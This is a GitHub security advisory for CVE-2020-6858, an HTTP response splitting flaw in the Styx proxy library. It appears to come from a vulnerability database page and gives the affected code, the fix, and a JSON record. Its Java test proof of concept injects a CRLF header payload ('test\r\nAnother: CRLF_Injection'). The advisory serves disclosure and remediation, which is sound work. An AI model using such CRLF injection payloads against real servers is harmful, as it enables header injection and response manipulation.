GHSA-6V7P-V754-J89V

Vulnerability from github – Published: 2020-03-03 15:32 – Updated: 2021-08-19 19:37
VLAI?
Summary
HTTP Response Splitting in Styx
Details

Vulnerability

Styx is vulnerable to CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting').

Vulnerable Component

The vulnerable component is the com.hotels.styx.api.HttpHeaders.Builder due to disabling the HTTP Header validation built into Netty in these locations:

https://github.com/HotelsDotCom/styx/blob/e1d578e9b9c38df9cd19c21dc2eb9b949d85b558/components/api/src/main/java/com/hotels/styx/api/HttpHeaders.java#L145

https://github.com/HotelsDotCom/styx/blob/e1d578e9b9c38df9cd19c21dc2eb9b949d85b558/components/api/src/main/java/com/hotels/styx/api/HttpHeaders.java#L145

new DefaultHttpHeaders(false) disables the built-in validation in Netty. Either use the default constructor or new DefaultHttpHeaders(true instead.

Additionally, another vulnerable component is the StyxToNettyResponseTranslator due to also disabling the HTTP Header validation built into netty in this location.

https://github.com/HotelsDotCom/styx/blob/8d60e5493e65d0d536afc0b350dcb02d24e0f7a7/components/server/src/main/java/com/hotels/styx/server/netty/connectors/StyxToNettyResponseTranslator.java#L30

DefaultHttpResponse nettyResponse = new DefaultHttpResponse(version, httpResponseStatus, false); new DefaultHttpResponse(version, httpResponseStatus, false); disables the built-in validation in Netty. Please use the constructor new DefaultHttpResponse(version, httpResponseStatus, true);

Proof of Concept

The following test plugin proves that there is no header validation occurring.

    static class VulnerablePlugin implements Plugin {

        @Override
        public Eventual<LiveHttpResponse> intercept(LiveHttpRequest request, Chain chain) {
            String header = request.queryParam("header-value").get();
            LiveHttpRequest newRequest = request.newBuilder()
                .header("myRequestHeader", header)
                .build();
            return chain.proceed(newRequest).map(response ->
                response.newBuilder().header("myResponseHeader", header).build()
            ) ;
        }

    }

    @Test
    public void simpleHeaderInjectionVulnerabilityPOC() {
        Plugin vulnerablePlugin = new VulnerablePlugin();
        // a simple way to mock the downstream system
        HttpInterceptor.Chain chain = request -> {
            assertThat(request.header("myRequestHeader").orElse(null), is("test\r\nAnother: CRLF_Injection"));
            return Eventual.of(response(OK).build());
        };

        // an example request you expect your plugin to receive
        String encodedGet = URLEncoder.encode("test\r\nAnother: CRLF_Injection");
        LiveHttpRequest request = get("/foo?header-value=" + encodedGet)
            .build();

        // since this is a test, we want to wait for the response
        LiveHttpResponse response = Mono.from(vulnerablePlugin.intercept(request, chain)).block();

        assertThat(response.header("myResponseHeader").orElse(null), is("test\r\nAnother: CRLF_Injection"));
    }

Additionally, if you run this LiveHttpResponse from this test through the StyxToNettyResponseTranslator::toNettyResponse, ideally, it would have caused an exception to be thrown. In its current state, it does not.

Similar Vulnerabilities

There have been reports of similar vulnerabilities in other popular libraries.

GHSA-35fr-h7jr-hh86 -> CVE-2019-16771 GHSA-mvqp-q37c-wf9j -> CVE-2019-17513

Finding

This vulnerability was found due to this query that Jonathan Leitschuh contributed to the Semmle QL project. https://lgtm.com/rules/1510696449842/alerts/

Severity ?
6.5 (Medium)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.0.0.beta8"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "com.hotels.styx:styx-api"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.0-rc1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-6858"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-74"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-03-03T15:31:22Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "# Vulnerability\nStyx is vulnerable to CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers (\u0026#39;HTTP Response Splitting\u0026#39;).\n\n# Vulnerable Component\nThe vulnerable component is the `com.hotels.styx.api.HttpHeaders.Builder` due to disabling the HTTP Header validation built into Netty in these locations:\n\nhttps://github.com/HotelsDotCom/styx/blob/e1d578e9b9c38df9cd19c21dc2eb9b949d85b558/components/api/src/main/java/com/hotels/styx/api/HttpHeaders.java#L145\n\nhttps://github.com/HotelsDotCom/styx/blob/e1d578e9b9c38df9cd19c21dc2eb9b949d85b558/components/api/src/main/java/com/hotels/styx/api/HttpHeaders.java#L145\n\n`new DefaultHttpHeaders(false)` disables the built-in validation in Netty. Either use the default constructor or `new DefaultHttpHeaders(true`  instead.\n\nAdditionally, another vulnerable component is the StyxToNettyResponseTranslator due to also disabling the HTTP Header validation built into netty in this location.\n\nhttps://github.com/HotelsDotCom/styx/blob/8d60e5493e65d0d536afc0b350dcb02d24e0f7a7/components/server/src/main/java/com/hotels/styx/server/netty/connectors/StyxToNettyResponseTranslator.java#L30\n\n `DefaultHttpResponse nettyResponse = new DefaultHttpResponse(version, httpResponseStatus, false); `\n`new DefaultHttpResponse(version, httpResponseStatus, false);` disables the built-in validation in Netty. Please use the constructor `new DefaultHttpResponse(version, httpResponseStatus, true);`\n\n# Proof of Concept\nThe following test plugin proves that there is no header validation occurring.\n\n```java\n    static class VulnerablePlugin implements Plugin {\n\n        @Override\n        public Eventual\u0026lt;LiveHttpResponse\u0026gt; intercept(LiveHttpRequest request, Chain chain) {\n            String header = request.queryParam(\u0026quot;header-value\u0026quot;).get();\n            LiveHttpRequest newRequest = request.newBuilder()\n                .header(\u0026quot;myRequestHeader\u0026quot;, header)\n                .build();\n            return chain.proceed(newRequest).map(response -\u0026gt;\n                response.newBuilder().header(\u0026quot;myResponseHeader\u0026quot;, header).build()\n            ) ;\n        }\n\n    }\n\n    @Test\n    public void simpleHeaderInjectionVulnerabilityPOC() {\n        Plugin vulnerablePlugin = new VulnerablePlugin();\n        // a simple way to mock the downstream system\n        HttpInterceptor.Chain chain = request -\u0026gt; {\n            assertThat(request.header(\u0026quot;myRequestHeader\u0026quot;).orElse(null), is(\u0026quot;test\\r\\nAnother: CRLF_Injection\u0026quot;));\n            return Eventual.of(response(OK).build());\n        };\n\n        // an example request you expect your plugin to receive\n        String encodedGet = URLEncoder.encode(\u0026quot;test\\r\\nAnother: CRLF_Injection\u0026quot;);\n        LiveHttpRequest request = get(\u0026quot;/foo?header-value=\u0026quot; + encodedGet)\n            .build();\n\n        // since this is a test, we want to wait for the response\n        LiveHttpResponse response = Mono.from(vulnerablePlugin.intercept(request, chain)).block();\n\n        assertThat(response.header(\u0026quot;myResponseHeader\u0026quot;).orElse(null), is(\u0026quot;test\\r\\nAnother: CRLF_Injection\u0026quot;));\n    }\n```\nAdditionally, if you run this LiveHttpResponse from this test through the `StyxToNettyResponseTranslator::toNettyResponse`, ideally, it would have caused an exception to be thrown. In its current state, it does not.\n\n# Similar Vulnerabilities\nThere have been reports of similar vulnerabilities in other popular libraries.\n\nGHSA-35fr-h7jr-hh86 -\u0026gt; CVE-2019-16771\nGHSA-mvqp-q37c-wf9j -\u0026gt; CVE-2019-17513\n\n\n# Finding\nThis vulnerability was found due to this query that [Jonathan Leitschuh](https://twitter.com/jlleitschuh) contributed to the Semmle QL project.\nhttps://lgtm.com/rules/1510696449842/alerts/",
  "id": "GHSA-6v7p-v754-j89v",
  "modified": "2021-08-19T19:37:59Z",
  "published": "2020-03-03T15:32:03Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/HotelsDotCom/styx/security/advisories/GHSA-6v7p-v754-j89v"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-6858"
    },
    {
      "type": "WEB",
      "url": "https://twitter.com/JLLeitschuh"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "HTTP Response Splitting in Styx"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.